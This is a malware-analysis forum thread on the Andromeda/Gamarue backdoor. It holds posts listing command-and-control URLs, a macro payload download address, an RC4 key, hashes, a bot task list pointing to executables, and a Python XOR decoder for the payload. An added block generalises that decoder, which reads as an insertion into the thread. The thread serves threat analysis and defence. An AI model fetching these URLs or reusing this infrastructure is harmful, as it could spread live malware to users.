Backdoor Andromeda (waahoo, alias Gamarue)

Forum for analysis and discussion about malware.
sysopfb
Posts: 97
Joined: Thu Oct 23, 2014 1:22 am

Re: Malware collection

Post by sysopfb » Sun Aug 16, 2015 4:37 pm

That's Andromeda

Code:

http://and4.junglebeariwtc1.com/bla08/adm.php

sysopfb
Posts: 97
Joined: Thu Oct 23, 2014 1:22 am

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by sysopfb » Tue Oct 27, 2015 8:07 pm

Word doc macro downloads:
hxxp://91.229.79.231:8080/cfab2e3d.jpg


Can be decoded using the following script:

Code:

# Decoder for the XOR-obfuscated blob fetched by the Word macro (Python 3).
array = list(range(0, 256))
arg1 = bytearray(open('cfab2e3d.jpg', 'rb').read())   # encoded payload
arg2 = bytearray(b"abc123")                           # hard-coded key; must be at least 6 bytes

arg1_len = len(arg1)
arg2_len = len(arg2)

# Extend the 256-entry table to 286 entries (256..285 ^ 256 == 0..29),
# then patch five slots at each end with key-derived values.
for i in range(256, 286):
    array.append(i ^ 256)
for i in range(1, 6):
    array[i + 249] = arg2[arg2_len - i - 1]
    array[i - 1] = arg2[i - 1] ^ (255 - arg2[arg2_len - i - 1])

meh = 0        # position in the key
ces = 0        # position in the table
peej = False   # alternates the table wrap point between 0 and 5
for i in range(0, arg1_len):
    if meh > arg2_len - 1:
        meh = 0
    if ces > 285 and not peej:
        ces = 0
        peej = True
    elif ces > 285 and peej:
        ces = 5
        peej = False
    arg1[i] = arg1[i] ^ (array[ces] ^ arg2[meh])
    meh += 1
    ces += 1

open('out.bin', 'wb').write(arg1)

Produces Andromeda:
0/43
https://www.virustotal.com/en/file/ad57 ... /analysis/

RC4 key: 19fc8d0b7d4edbb2123ecf6adb73df3a

Same bot that was popping domains previously.
C2:
hxxp://lipetskrulit.com/and/gate.php
hxxp://123ga6sd7d1123.com/and/gate.php

[5,{"klt":0},[1,1,"http:\/\/lipetskrulit.com\/886.exe"],[4,1,"http:\/\/91.229.79.231:8080\/PWSBin.exe"],[6,1,"http:\/\/91.229.79.231:8080\/drose.exe"]]
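
The decoder above is a one-off script hard-wired to cfab2e3d.jpg and the key abc123. The block below is an added example, not code from the original post: it turns the same keystream construction into reusable functions, checks the round-trip on a constructed fake-PE blob (XOR is symmetric, so the same routine encodes and decodes), and pulls the download URLs out of the task list quoted in the post. The table patching indexes key[len-i-1] for i = 1..5, so the key must be at least 6 bytes; the original script would silently wrap to negative indices with a shorter key, and the function below rejects that case instead. The meaning of the numeric task ids is not stated on the page, so the parser returns them untouched. The sample data is constructed; the real cfab2e3d.jpg is not included.

```python
"""Generalised decoder for the XOR scheme used by the macro-downloaded payload,
plus a parser for the Andromeda task list. Added example; the sample input is
constructed and is not real malware."""
import json
from typing import List, Tuple

TABLE_LEN = 286          # 256 identity bytes + 30 wrapped extras (256..285 ^ 256)
KEY_PATCH_ROUNDS = 5     # the posted script patches 5 table slots at each end


def build_table(key: bytes) -> List[int]:
    """Key-dependent 286-entry table, same construction as the posted script.
    Needs len(key) >= 6 because slots are patched from key[len-i-1] for i=1..5."""
    if len(key) < KEY_PATCH_ROUNDS + 1:
        raise ValueError("key must be at least 6 bytes")
    table = list(range(256)) + [i ^ 256 for i in range(256, TABLE_LEN)]
    n = len(key)
    for i in range(1, KEY_PATCH_ROUNDS + 1):
        table[i + 249] = key[n - i - 1]
        table[i - 1] = key[i - 1] ^ (255 - key[n - i - 1])
    return table


def xor_stream(data: bytes, key: bytes) -> bytes:
    """Apply the keystream. XOR is symmetric, so this both encodes and decodes."""
    table = build_table(key)
    out = bytearray(data)
    key_pos = 0            # 'meh' in the posted script: index into the key
    tab_pos = 0            # 'ces': index into the table
    second_half = False    # 'peej': alternates the wrap point between 0 and 5
    for i in range(len(out)):
        if key_pos >= len(key):
            key_pos = 0
        if tab_pos > TABLE_LEN - 1:
            tab_pos = 5 if second_half else 0
            second_half = not second_half
        out[i] ^= table[tab_pos] ^ key[key_pos]
        key_pos += 1
        tab_pos += 1
    return bytes(out)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check: the decoded payload on the page was a PE (Andromeda)."""
    return blob[:2] == b"MZ"


def parse_tasks(raw: str) -> List[Tuple[int, int, str]]:
    """Split the bot task list into (task_id, flag, url) tuples.
    Layout seen on the page: [version, {...}, [id, flag, url], ...]. The numeric
    ids are not explained there, so they are passed through unchanged."""
    doc = json.loads(raw)
    return [(t[0], t[1], t[2]) for t in doc[2:] if isinstance(t, list) and len(t) == 3]


# Constructed sample (not real malware): fake PE header plus >286 bytes of filler
# so the table wrap-around path is exercised.
SAMPLE_KEY = b"abc123"
SAMPLE_PLAIN = b"MZ\x90\x00" + bytes(i % 256 for i in range(300))
SAMPLE_ENCODED = xor_stream(SAMPLE_PLAIN, SAMPLE_KEY)

# Task list as posted (JSON with escaped slashes), kept in a raw string.
TASKS_RAW = r'[5,{"klt":0},[1,1,"http:\/\/lipetskrulit.com\/886.exe"],[4,1,"http:\/\/91.229.79.231:8080\/PWSBin.exe"],[6,1,"http:\/\/91.229.79.231:8080\/drose.exe"]]'

if __name__ == "__main__":
    decoded = xor_stream(SAMPLE_ENCODED, SAMPLE_KEY)
    print("round-trip ok:", decoded == SAMPLE_PLAIN, "PE header:", looks_like_pe(decoded))
    for task_id, flag, url in parse_tasks(TASKS_RAW):
        print(task_id, flag, url)
```

To use it on a real sample, read the downloaded blob and call xor_stream(blob, key) with whatever key the macro or dropper carries; if the result does not start with MZ, the key or the table patching differs from this variant.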

ikolor
Posts: 322
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sat Dec 26, 2015 9:24 am


blub.txt
Posts: 3
Joined: Mon Sep 12, 2011 9:56 pm

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by blub.txt » Sat Jan 16, 2016 11:36 am


ikolor
Posts: 322
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Feb 24, 2016 3:11 pm


ikolor
Posts: 322
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sun Apr 10, 2016 7:45 am


benkow_
Posts: 85
Joined: Sat Jan 24, 2015 12:14 pm

Re: Malware collection

Post by benkow_ » Sun Apr 10, 2016 9:37 am

Gamarue / Andromeda

geoffreyvdb
Posts: 16
Joined: Mon Feb 22, 2016 1:00 pm

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by geoffreyvdb » Mon May 02, 2016 10:56 am

Andromeda/Gamarue, 1/57
40cb267f944376dc378825cb23884e6f

drops msvmj.exe to C:\ProgramData
40cb267f944376dc378825cb23884e6f

CNC:
htxp://and28.aviationdreamflightering1.com/bla28/gate1.php
htxp://and28.aviationdreamflightering2.com/bla28/gate2.php
htxp://and28.aviationdreamflightering3.com/bla28/gate3.php

https://www.virustotal.com/en/file/cb8d ... /analysis/

geoffreyvdb
Posts: 16
Joined: Mon Feb 22, 2016 1:00 pm

Re: Backdoor Andromeda (waahoo, alias Gamarue)

Post by geoffreyvdb » Mon May 02, 2016 5:30 pm

forgot sample

xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Mon Jun 20, 2016 10:58 am

Found from a dropper

I think that it is Andromeda. Can anyone confirm ?
Last edited by EP_X0FF on Mon Jun 20, 2016 6:58 pm, edited 1 time in total.
Reason: added password for archive
@xorsthingsv2
